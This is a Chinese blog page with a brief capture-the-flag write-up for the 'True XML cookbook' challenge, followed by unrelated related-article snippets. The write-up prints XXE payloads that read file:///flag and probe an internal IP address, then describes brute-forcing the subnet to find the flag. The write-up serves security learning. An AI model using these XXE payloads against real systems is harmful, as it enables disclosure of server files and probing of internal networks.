True XML cookbook

embedded/2024/9/20 13:36:40/ 标签: xml

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "http://10.244.80.49/">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>
 

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag


http://www.ppmy.cn/embedded/99646.html

相关文章

Python酷库之旅-第三方库Pandas(093)

目录 一、用法精讲 396、pandas.Series.to_frame方法 396-1、语法 396-2、参数 396-3、功能 396-4、返回值 396-5、说明 396-6、用法 396-6-1、数据准备 396-6-2、代码示例 396-6-3、结果输出 397、pandas.Series.to_xarray方法 397-1、语法 397-2、参数 397-3、…

FPGA开发——DS18B20的使用(理论)

介绍 DS18B20是一种常见的数字温度传感器&#xff0c;其控制命令和数据都是以数字信号的方式输入输出&#xff0c;相比较于模拟温度传感器&#xff0c;具有功能强大、硬件简单、易扩展、抗干扰性强等特点 测温范围&#xff1a;-55C 到 125C 通信接口&#xff1a;1-Wire&…

Clickhouse中bitmap使用指南(ck位图)

clickhouse在20以后的版本支持数据列为64位的压缩位图 内部实际类型为Roaring64NavigableMap&#xff0c;具体可参考https://github.com/RoaringBitmap/CRoaring 1、如何建表 只需要设置列的类型为 AggregateFunction(groupBitmap,UInt64) 即可 例: CREATE TABLE test.bit…

MB Star C4/C5/C6 lastest software 2024.04 Update

V2024.03 Car / V2024.04 Truck MB Star C4/C5 BENZ Diagnostic Software with Xentry/DAS/EPC/WIS/Vediamo/DTS MB Star diagnostic Xentry 03.2024 release is now available,so far everything works as before ……It is confirmed working perfectly with 12v 24 Mercede…

C++基础面试题 | C++中值传递和引用传递的区别?

不畏浮云遮望眼&#xff0c;只缘身在最高层。 - 《登飞来峰》(王安石) 2024.8.23 回答重点&#xff1a;C中的值传递和引用传递是两种不同的参数传递方式&#xff0c;它们在函数调用时对参数的处理方式不同。 值传递&#xff1a;在这种方式下&#xff0c;当函数被调用时&#xf…

基于Nginx进行服务器隐私保护:隐藏真实的服务器IP地址或主机名( 转发代理、服务器的别名)

文章目录 引言I 隐藏站点请求API的真实服务器IP和端口查看主文件配置服务的端口和站点目录的映射配置proxy_pass代理转发代理转发的其他配置【可选】II 服务器主机名处理隐藏真实的服务器主机名判断API请求是哪个服务器处理的III GLC日志中心新增用户信息扩展:在Linux中配置主…

《重温JavaScript五子棋小游戏》

目录 全部运行代码&#xff1a;五子棋游戏的基本步骤&#xff1a;代码剖析&#xff1a;1. 初始化游戏界面2. 管理游戏状态3. 玩家交互4. 电脑AI5. 胜负判定6. 游戏控制 本文通过实现一个基本的五子棋游戏&#xff0c;展示了如何使用HTML、CSS和JavaScript来构建一个简单的交互式…

粘包,Telnet,SSH,Wireshark

一&#xff0c;粘包 原因&#xff1a;tcp为流式套接字&#xff0c;数据与数据间没有边界&#xff0c;导致多次数据粘到一起。 解决&#xff1a; 1.规定一些数据间的间隔符&#xff0c;"\aa","\r\n"; 2.可以指定要发送对象的数据长度。 3.自己将数据打包。 …

38-java代码可以实现一次编写 到处运行

Java的“一次编写到处运行”是指&#xff0c;编写的Java代码可以在任何支持Java的操作系统上运行&#xff0c;这是因为Java有一个称为Java Virtual Machine&#xff08;JVM&#xff09;的虚拟机&#xff0c;它负责将Java代码转换成特定于操作系统的机器指令。只要你有支持Java的…

Mac 安装 Homebrew

一、Homebrew 简介 官网地址&#xff1a;https://brew.sh/zh-cn/ 是什么 Homebrew 是一款 Mac OS 平台下的软件包管理工具&#xff0c;拥有安装、卸载、更新、查看、搜索等很多实用的功能。 简单的一条指令&#xff0c;就可以实现包管理&#xff0c;而不用你关心各种依赖和文…

哈希表相关内容

基础知识 哈希表最大的优点是高效&#xff0c;在哈希表中插入、删除或查找一个元素都只需要O(1)的时间&#xff0c;在java中哈希表有两个对应的类型&#xff0c;即HashSet和HashMap。HashSet常用函数 序号函数函数功能1add在HashSet中添加一个元素2contains判断HashSet中是否包…

【题解】【结构体排序】—— [NOIP2009 普及组] 分数线划定

【题解】【结构体排序】—— [NOIP2009 普及组] 分数线划定 [NOIP2009 普及组] 分数线划定题目描述输入格式输出格式输入输出样例输入 #1输出 #1 提示 1.题意解析2.AC代码 [NOIP2009 普及组] 分数线划定 戳我查看题目&#xff08;洛谷&#xff09; 题目描述 世博会志愿者的选…

【学习笔记】8、脉冲波形的变换与产生

本章简略记录。 8.1 单稳态触发器&#xff08;脉冲触发&#xff09; 单稳态触发器 应用于 &#xff1a;&#xff08;1&#xff09;脉冲整型&#xff08;2&#xff09;脉冲延时 &#xff08;3&#xff09;定时 单稳态触发器的工作特性&#xff1a; 没有触发脉冲作用时&#xf…

成为一名厉害的黑客,必须知道的12个步骤,黑客入门

黑客攻防是一个极具魅力的技术领域&#xff0c;但成为一名黑客毫无疑问也并不容易。你必须拥有对新技术的好奇心和积极的学习态度&#xff0c;具备很深的计算机系统、编程语言和操作系统知识&#xff0c;并乐意不断地去学习和进步。 如果你想成为一名优秀的黑客&#xff0c;下…

ROS 2核心要点

关于ROS 2&#xff08;Robot Operating System 2&#xff09;的详细介绍&#xff0c;可以从以下几个方面进行阐述&#xff1a; 一、概述 ROS 2是机器人操作系统&#xff08;Robot Operating System&#xff09;的第二代版本&#xff0c;它是ROS 1的升级版本&#xff0c;旨在解…

二叉树中序迭代遍历python

# 中序遍历-迭代-LC94_二叉树的中序遍历 class Solution:def inorderTraversal(self, root: TreeNode) -> List[int]:if not root:return []stack [] # 不能提前将root结点加入stack中result []cur rootwhile cur or stack:# 先迭代访问最底层的左子树结点if cur: s…

python 简易应用: 一键完成!将ios 的heic图片批量转为jpeg(二)

上一帖本来是打算用一个python脚本完成的 &#xff0c;但是pyheif依赖安装没搞定&#xff0c;总是出错&#xff0c;因此折衷用了两步&#xff1a;&#xff11;。先用py脚本处理 &#xff12;。再通过批处理调用imagemagick来实现&#xff0c;基本上也是一键完成&#xff0c; 只…

使用VRoid Studio二次元建模,创建专属于自己的二次元卡通人物模型,创建完全免费开源且属于自己VRM模型

最终效果 文章目录 最终效果什么是VRoid Studio官网地址下载安装VRoid Studio1、可以去它的官网下载2、steam安装 创建模型配置参数 导出模型使用别人的VRM模型这里我分享几个不错的模型&#xff0c;大家可以自行去下载 完结 什么是VRoid Studio 如果你玩过能捏脸的游戏你就能…

Linux buffer/cache

清除方法 echo 1 > /proc/sys/vm/drop_caches # 仅清除页面缓存 echo 2 > /proc/sys/vm/drop_caches # 清除目录项和inode echo 3 > /proc/sys/vm/drop_caches # 清除页面缓存、目录项以及inode 下面了解一下这几种都是什么,简单理解&#xff0c;目录项和inode&…

[Python可视化]空气污染物浓度地图可视化

[Python可视化]空气污染物浓度地图可视化&#xff0c;果然是路边浓度最大 在本篇文章中&#xff0c;我将展示如何使用 Python 结合 OSMnx、NetworkX 和 GeoPandas 等库&#xff0c;计算给定路径的最短路线&#xff0c;并基于该路径穿过的网格单元计算总污染量。最终&#xff0c…